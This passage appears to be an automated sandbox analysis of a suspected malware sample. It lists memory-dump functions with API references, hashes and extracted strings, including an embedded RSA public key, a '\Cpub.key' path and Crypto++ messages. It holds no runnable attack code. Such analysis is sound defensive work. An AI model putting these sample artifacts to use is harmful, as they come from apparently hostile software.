                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID:
                                • API String ID: 2943138195-0
                                • Opcode ID: e8d398205969000b3ec5f893af6ddee2de538be29fc6069a13b57537aa39e034
                                • Instruction ID: b02fba8e34796b0931a660fb9fea3587281161d96e48a62521ccb2772502669a
                                • Opcode Fuzzy Hash: e8d398205969000b3ec5f893af6ddee2de538be29fc6069a13b57537aa39e034
                                • Instruction Fuzzy Hash: C6415C73A21B94CAEB02CF68E8803AC7BF0F764B48F948015DB4957719DBB8C495C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0122348A
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 01223431
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 3215553584-3729741635
                                • Opcode ID: 92177e2710676bf4aa7109e564e5e75b7de8e34d6d118c7171c0fa498b964675
                                • Instruction ID: 8351b1fa8810b05a5bf3b8219c8d39229e29887290ce9ca275884f4f8eb3d7b9
                                • Opcode Fuzzy Hash: 92177e2710676bf4aa7109e564e5e75b7de8e34d6d118c7171c0fa498b964675
                                • Instruction Fuzzy Hash: DD81DFB27357A1AAEF29CB6894402BD77A5F74CBB4B044621DF6A07B98DB3CC052C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121EAB0
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121ECD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: *
                                • API String ID: 3215553584-163128923
                                • Opcode ID: ba3a2c5b4d9247ee1904926a787fea605bee3c3b1ea410f30ca3f6d9ef81f682
                                • Instruction ID: 825b627922b5235f4078b1aab8dd48a4e7ffd5f02841a74710eda897ba45579e
                                • Opcode Fuzzy Hash: ba3a2c5b4d9247ee1904926a787fea605bee3c3b1ea410f30ca3f6d9ef81f682
                                • Instruction Fuzzy Hash: 4251B9B31306228AD72ACF2D8D8557D3BE0F365F18B56122ADF464325CEB71C582CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AF9B2
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AF9BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: \Cpub.key
                                • API String ID: 73155330-3023347968
                                • Opcode ID: f4d827aacf24c00a50dd9275c860127db1eb1b6c03b6b82a1f8197a0f224aa1a
                                • Instruction ID: 6e60e2a31dd9321b09775f95f5642133f56762441a8bc41248f3ed324bd33268
                                • Opcode Fuzzy Hash: f4d827aacf24c00a50dd9275c860127db1eb1b6c03b6b82a1f8197a0f224aa1a
                                • Instruction Fuzzy Hash: 48410137200B8692EA18DF26E1542AD7761F329BE4F944A22DFAD07391DF78D1D6C380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011B0BC5
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B0BD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: NameValuePairs: type mismatch for '
                                • API String ID: 73155330-2289452559
                                • Opcode ID: 33dc4145b7ccdb2b109325a22d477dc6c3d4d2c24bf94bddb2a0f751c84825fd
                                • Instruction ID: 0a3cc343f4412591853a2193963ef03b8b718497889bc637ae14603f5f5a52e5
                                • Opcode Fuzzy Hash: 33dc4145b7ccdb2b109325a22d477dc6c3d4d2c24bf94bddb2a0f751c84825fd
                                • Instruction Fuzzy Hash: 6741C172311B4595DE18DF26A6902AAA361F75CBE4F484B21EFAD07BA8DF78C091C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011B0A27
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B0A2D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: \Cpub.key
                                • API String ID: 73155330-3023347968
                                • Opcode ID: 369e3b6333a0beebe94c4e66943492a277f88c34e79b838861dbe73f0cf7c0c3
                                • Instruction ID: ac7d9b1b7da4137cc66bcf4a4076fa1bb7a91b1878d0584b4f8892c50b14068a
                                • Opcode Fuzzy Hash: 369e3b6333a0beebe94c4e66943492a277f88c34e79b838861dbe73f0cf7c0c3
                                • Instruction Fuzzy Hash: 0B41D372311B8595DE28DB26E49029E6365F759FE4F844726EFAD07B88DF78C181C304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0122F5DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: e+000$gfff
                                • API String ID: 3215553584-3030954782
                                • Opcode ID: 71c01f4ffae9af6187e086b39dfc9564447c7f031ae2026d9d054cbbc4784454
                                • Instruction ID: 524210812c474e885eed029f83b87d651ebf1b613ebcf0ad06adb431d50a98dd
                                • Opcode Fuzzy Hash: 71c01f4ffae9af6187e086b39dfc9564447c7f031ae2026d9d054cbbc4784454
                                • Instruction Fuzzy Hash: EA414B637247D59AD7258F39EA4036D7BA1E391B90F48D225CBA88BBA9DB3DC044C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D6297
                                  • Part of subcall function 011D6030: __std_exception_copy.LIBVCRUNTIME ref: 011D605D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                • String ID: *$FileSink: error opening file for writing:
                                • API String ID: 1109970293-3616816822
                                • Opcode ID: 99675378ff557f912b50d04242978072256d4e38bfd51ad8b7e2cb933c27e4a4
                                • Instruction ID: b7bc2d477b855f6b01b03123b60be44bca1f93dc224c79946a00c2804852750f
                                • Opcode Fuzzy Hash: 99675378ff557f912b50d04242978072256d4e38bfd51ad8b7e2cb933c27e4a4
                                • Instruction Fuzzy Hash: 0351AA76318B84C6DB04CF65E89039EB362F799B94F944522EB8C07B98EB78C594CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AE215
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE21B
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 011AE0C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 73155330-3729741635
                                • Opcode ID: ca5bb69d62908af39e2c0d3003be1488b504b5b4b530d432268a567c6cd071db
                                • Instruction ID: 29c3a993ccc6a056408eaf53a33c98033603e73d5ff5789b0f30c0b3723d8034
                                • Opcode Fuzzy Hash: ca5bb69d62908af39e2c0d3003be1488b504b5b4b530d432268a567c6cd071db
                                • Instruction Fuzzy Hash: 7F31043630279499DE1CEF1AA9542996B62F719BE4F884725DFAD0B7C8DF78E091C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AA4D9
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AA4E5
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 011AA379, 011AA736
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 73155330-3729741635
                                • Opcode ID: bb416e4ee0c77ff1a7cdc21339430d016ddaf230495b2882a6db979533de2db1
                                • Instruction ID: dc1049c1efffa1cda362aff134c45499f56c4415a7b935d7692b21f22a82303b
                                • Opcode Fuzzy Hash: bb416e4ee0c77ff1a7cdc21339430d016ddaf230495b2882a6db979533de2db1
                                • Instruction Fuzzy Hash: 5931F06630269595DD1CDF16E9582AC2A61AB05FF4F8C4725AF3E07BD4DFB8C482C304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AA87A
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AA886
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 011AA379, 011AA736
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 73155330-3729741635
                                • Opcode ID: 468976f89f9ea19c4946f3a4f8e864098dadd1568dffb1fad58afb0a740db5c5
                                • Instruction ID: b8eb89a3b8c632de73d42487faec91091dfd05f47713bf240946c975d6afb1a3
                                • Opcode Fuzzy Hash: 468976f89f9ea19c4946f3a4f8e864098dadd1568dffb1fad58afb0a740db5c5
                                • Instruction Fuzzy Hash: 1931E326302A8549EE1DDB6AA6503296A519B05FF9F8846218F3D07BD8DF78C0C3C344
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183603
                                  • Part of subcall function 01210818: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 0121085C
                                  • Part of subcall function 01210818: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 012108A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ExceptionFileHeaderRaise_invalid_parameter_noinfo_noreturn
                                • String ID: 0 @$ios_base::badbit set
                                • API String ID: 38560573-2270638013
                                • Opcode ID: cf819bddb75dd1dc14d1fa21c549cc26a3581f3dcbdc55b996b6384414cb4063
                                • Instruction ID: 21dd0e6bc1973f523790ec1af500587957bc561547ab5cfc30815fc141d26902
                                • Opcode Fuzzy Hash: cf819bddb75dd1dc14d1fa21c549cc26a3581f3dcbdc55b996b6384414cb4063
                                • Instruction Fuzzy Hash: 91310833224B8496DB18EB2CE4403AE7761F795BA8F588315E7AD03BA4DF78C551CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AF6B7
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AF6BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                • String ID: \Cpub.key
                                • API String ID: 73155330-3023347968
                                • Opcode ID: 3b89f6e1e0ba81967857270ada6efdfe85d755a5444cf6be8ff9c789091a2be9
                                • Instruction ID: 4f90fa15c8b8ffd0268e6cb31bec288976415a6062fbd9f62df32690c642e6d7
                                • Opcode Fuzzy Hash: 3b89f6e1e0ba81967857270ada6efdfe85d755a5444cf6be8ff9c789091a2be9
                                • Instruction Fuzzy Hash: 7021AD26301B8594DE2CDF26A5106AD6AA1E758BF4F984B319F7D8B7E4DF78D092C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite
                                • String ID: U
                                • API String ID: 442123175-4171548499
                                • Opcode ID: d9743f18f192b6bffc1daff7fa244e999753d9754f3aed78fa992c35197c3da7
                                • Instruction ID: d482d8e449690265ba54bd25b517262b7263dba59085e611ef6f37aeeee4510f
                                • Opcode Fuzzy Hash: d9743f18f192b6bffc1daff7fa244e999753d9754f3aed78fa992c35197c3da7
                                • Instruction Fuzzy Hash: C731CE72724A9096DB20CF25E8403AAB7A1F798B94F854025EF4D87758EF3CC151CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __std_exception_copy.LIBVCRUNTIME ref: 011B548D
                                Strings
                                • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 011B53F3
                                • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 011B5426
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: __std_exception_copy
                                • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                • API String ID: 592178966-3345525433
                                • Opcode ID: 9948625fc6c8382b6793a34e2efc5e772a8a8b7a7e9cecc82b49f15daa052eb1
                                • Instruction ID: 9943b15489d392998320b422fe112ef93de6bbb5f7d07c4ac0df1583272c01c9
                                • Opcode Fuzzy Hash: 9948625fc6c8382b6793a34e2efc5e772a8a8b7a7e9cecc82b49f15daa052eb1
                                • Instruction Fuzzy Hash: 6C31C032214A46A2EF14EF24E8903D97371FBA4388F949122DB8C47728FF78C669C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 01223361
                                • _invalid_parameter_noinfo.LIBCMT ref: 012233BB
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 012232E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 3215553584-3729741635
                                • Opcode ID: 17eac1953acfe6f0d9f3b1f1bcf075f1bf6f858a32a4fdcd5392260a06d28a80
                                • Instruction ID: 02efead20b68186bbf44ef530848c5ab7a4e77ad94bc0bac470eecb034ba5405
                                • Opcode Fuzzy Hash: 17eac1953acfe6f0d9f3b1f1bcf075f1bf6f858a32a4fdcd5392260a06d28a80
                                • Instruction Fuzzy Hash: 1D31F6323347A6A1DB22CF19954026E6660FB58BF0F445711EFA907BD4DF3DC1528780
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: NameName::
                                • String ID: %lf
                                • API String ID: 1333004437-2891890143
                                • Opcode ID: 7d9a4254e6f3d64acc9bc12bf2c2413a03d898f99a537aa06c22203ecf4ff412
                                • Instruction ID: dc44c59cbb0881ec60ca9ab1dffa7fb08bd7b88b31d3ab095e6312954ae29b2d
                                • Opcode Fuzzy Hash: 7d9a4254e6f3d64acc9bc12bf2c2413a03d898f99a537aa06c22203ecf4ff412
                                • Instruction Fuzzy Hash: 6E21D233628BD495DB20CF25F8903AA7BA4F3A9B84F998522DA8D47718DB3CC155CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01217AAE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: void$void
                                • API String ID: 2943138195-3746155364
                                • Opcode ID: 3900f69717ea2afe58e8ab99d693154e0aea7ccaa4012e48414ed46053fdcb26
                                • Instruction ID: 14328e5dbf1e21a87054188ee11965503ee660d12d7708b93fb83fc90b0c9255
                                • Opcode Fuzzy Hash: 3900f69717ea2afe58e8ab99d693154e0aea7ccaa4012e48414ed46053fdcb26
                                • Instruction Fuzzy Hash: 74314F72B20B559DEB11DFA4E8412ED3BB0F768748F940126DF4E57B18DB788254C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SimpleString::operator=.MSOBJ140-MSVCRT ref: 011EF909
                                  • Part of subcall function 01181DE0: __std_exception_copy.LIBVCRUNTIME ref: 01181F3F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011EF990
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: SimpleString::operator=__std_exception_copy_invalid_parameter_noinfo_noreturn
                                • String ID: 0 @
                                • API String ID: 675954111-947018160
                                • Opcode ID: b33cad6c91a5862da9c9af030606892ee67b8cd01e2395d48d7451877705e41f
                                • Instruction ID: f27bcb052aa827b2032aaa79be639f89cb8a1274331cbf6a2081e82584e13cde
                                • Opcode Fuzzy Hash: b33cad6c91a5862da9c9af030606892ee67b8cd01e2395d48d7451877705e41f
                                • Instruction Fuzzy Hash: 1311C022B10B6589FB04DBB5E8543AD2370BB58BACF544615DF6C27B98EF74C482C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 0122D319
                                • CompareStringW.KERNEL32 ref: 0122D3A1
                                Strings
                                Memory Dump Source
